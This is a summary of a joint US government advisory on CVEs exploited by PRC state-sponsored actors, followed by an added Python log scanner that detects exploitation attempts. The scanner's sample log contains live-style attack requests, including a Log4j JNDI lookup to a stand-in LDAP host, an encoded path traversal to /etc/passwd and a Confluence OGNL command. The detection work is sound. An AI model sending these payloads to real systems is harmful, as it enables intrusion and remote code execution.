PRC state-sponsored cyber actors continue to exploit publicly known vulnerabilities in U.S. and allied networks, targeting technology companies in order to steal intellectual property and to gain access into sensitive networks.
The joint Cybersecurity Advisory (CSA) is intended to inform federal and state, local, tribal and territorial government agencies, and especially organizations involved in critical infrastructure, about the CVEs these actors rely on.
CVEs used by Chinese state-sponsored cyber actors
NSA, CISA and the FBI assess that state-sponsored actors with ties to the PRC are among the most significant and dynamic threats to U.S. government and civilian networks.
The CSA lists the following CVEs as the ones most frequently exploited by PRC state-sponsored actors since 2020:
- CVE-2021-44228 (Apache Log4j): Remote Code Execution
- CVE-2019-11510 (Pulse Connect Secure): Arbitrary File Read
- CVE-2021-22205 (GitLab CE/EE): Remote Code Execution
- CVE-2022-26134 (Atlassian Confluence): Remote Code Execution
- CVE-2021-26855 (Microsoft Exchange): Remote Code Execution
- CVE-2020-5902 (F5 BIG-IP): Remote Code Execution
- CVE-2021-22005 (VMware vCenter Server): Arbitrary File Upload
- CVE-2019-19781 (Citrix ADC): Path Traversal
- CVE-2021-1497 (Cisco HyperFlex): Command Line Execution
- CVE-2021-20090 (Buffalo WSR): Relative Path Traversal
- CVE-2021-26084 (Atlassian Confluence): Remote Code Execution
- CVE-2021-36260 (Hikvision web server): Command Injection
- CVE-2021-42237 (Sitecore XP): Remote Code Execution
- CVE-2022-1388 (F5 BIG-IP): Remote Code Execution
- CVE-2022-24112 (Apache APISIX): Authentication Bypass by Spoofing
- CVE-2021-40539 (Zoho ManageEngine ADSelfService Plus): Remote Code Execution
- CVE-2021-26857 (Microsoft Exchange): Remote Code Execution
- CVE-2021-26858 (Microsoft Exchange): Remote Code Execution
- CVE-2021-27065 (Microsoft Exchange): Remote Code Execution
- CVE-2021-41773 (Apache HTTP Server): Path Traversal
The actors continue to route their activity through virtual private networks (VPNs) to obscure its origin, and they target web-facing applications to establish initial access.
Many of the CVEs listed above give the actors unauthorized access to sensitive networks; once inside, they work to keep that access without being noticed.
NSA, CISA and the FBI urge organizations to apply the following mitigations as soon as possible:
- Keep systems up to date and patched.
- Prioritize patching the vulnerabilities in this CSA together with the other known exploited vulnerabilities it references.
- Use phishing-resistant multifactor authentication wherever possible.
- Require strong, unique passwords.
- Block obsolete or unused protocols at the network edge.
- Upgrade or replace end-of-life equipment as soon as possible.
- Move toward a Zero Trust security model.
- Enable robust logging on Internet-facing systems and monitor those logs for anomalous activity.
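The last mitigation is the one that catches exploitation attempts against the CVEs above while a patch is still pending. The script below is an added example written for this summary, not code from the advisory or from NSA, CISA or the FBI. It scans web-server access logs in Combined Log Format for request patterns associated with four of the listed CVEs: the encoded dot-dot traversal of CVE-2021-41773, the `/vpn/../vpns/` traversal of CVE-2019-19781, the OGNL expression in the URI path used against CVE-2022-26134, and the `${jndi:` lookup of CVE-2021-44228 in any request field. The log lines are constructed for the demonstration, and the regexes are assumptions distilled from public write-ups of each CVE rather than vendor-published signatures; tune them against your own traffic before relying on them.

```python
"""Flag access-log requests that match patterns tied to CVEs from the CSA list.

Example code added to this summary; the detection regexes are assumptions
based on public descriptions of each CVE, not official signatures.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote

# Combined Log Format: ip ident user [ts] "METHOD PATH PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Log4j lookup wrappers used to hide "jndi": ${lower:j} -> j, ${upper:J} -> J, ${::-j} -> j
LOOKUP_WRAP_RE = re.compile(r'\$\{(?:lower:|upper:|::-)(.)\}', re.IGNORECASE)


@dataclass(frozen=True)
class Rule:
    cve: str
    description: str
    field: str            # "raw_path" (as logged), "path" (decoded) or "any" (all decoded fields)
    pattern: re.Pattern


RULES = [
    # Apache 2.4.49 traversal only works when the dots are percent-encoded, so the
    # raw path is checked; a plain "/../" from a browser is not flagged by this rule.
    Rule("CVE-2021-41773", "Apache HTTP Server encoded dot-dot traversal",
         "raw_path", re.compile(r'(?:\.%2e|%2e\.|%2e%2e)/', re.IGNORECASE)),
    Rule("CVE-2019-19781", "Citrix ADC traversal from /vpn/ into /vpns/",
         "path", re.compile(r'/vpn/\.\./vpns/', re.IGNORECASE)),
    Rule("CVE-2022-26134", "Confluence OGNL expression in the URI path",
         "path", re.compile(r'^/\$\{')),
    Rule("CVE-2021-44228", "Log4j JNDI lookup in path, referer or user agent",
         "any", re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)),
]


def deobfuscate(text: str) -> str:
    """URL-decode, then collapse Log4j lookup wrappers until nothing changes."""
    text = unquote(text)
    while True:
        collapsed = LOOKUP_WRAP_RE.sub(r'\1', text)
        if collapsed == text:
            return text
        text = collapsed


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def match_rules(fields: dict) -> list[str]:
    """Return the CVE ids whose rule matches this parsed request."""
    raw_path = fields["path"]
    decoded_path = deobfuscate(raw_path)
    everything = "\n".join(deobfuscate(fields[k]) for k in ("path", "referer", "ua"))
    targets = {"raw_path": raw_path, "path": decoded_path, "any": everything}
    return [rule.cve for rule in RULES if rule.pattern.search(targets[rule.field])]


def scan_log(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, client ip, CVE) for every matching request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = parse_line(line)
        if fields is None:
            continue
        for cve in match_rules(fields):
            findings.append((lineno, fields["ip"], cve))
    return findings


# Constructed sample traffic for the demonstration; the IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2022:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Oct/2022:12:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1321 "-" "curl/7.79"
203.0.113.9 - - [10/Oct/2022:12:00:03 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 200 "-" "python-requests/2.28"
203.0.113.10 - - [10/Oct/2022:12:00:04 +0000] "GET /%24%7B%28%23a%3D%27ls%27%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.79"
203.0.113.11 - - [10/Oct/2022:12:00:05 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://198.51.100.5/a}"
203.0.113.12 - - [10/Oct/2022:12:00:06 +0000] "GET /docs/../images/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for lineno, ip, cve in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {ip} -> {cve}")
```

Lines 2 to 5 of the sample are flagged, one CVE each; line 6, a plain `..` that any browser would normalize, is not, because the Apache rule deliberately keys on the percent-encoded dots that made CVE-2021-41773 bypass path normalization. The Log4j rule reads the referer and user-agent fields as well as the path, since those headers were commonly logged and commonly used to deliver the lookup string.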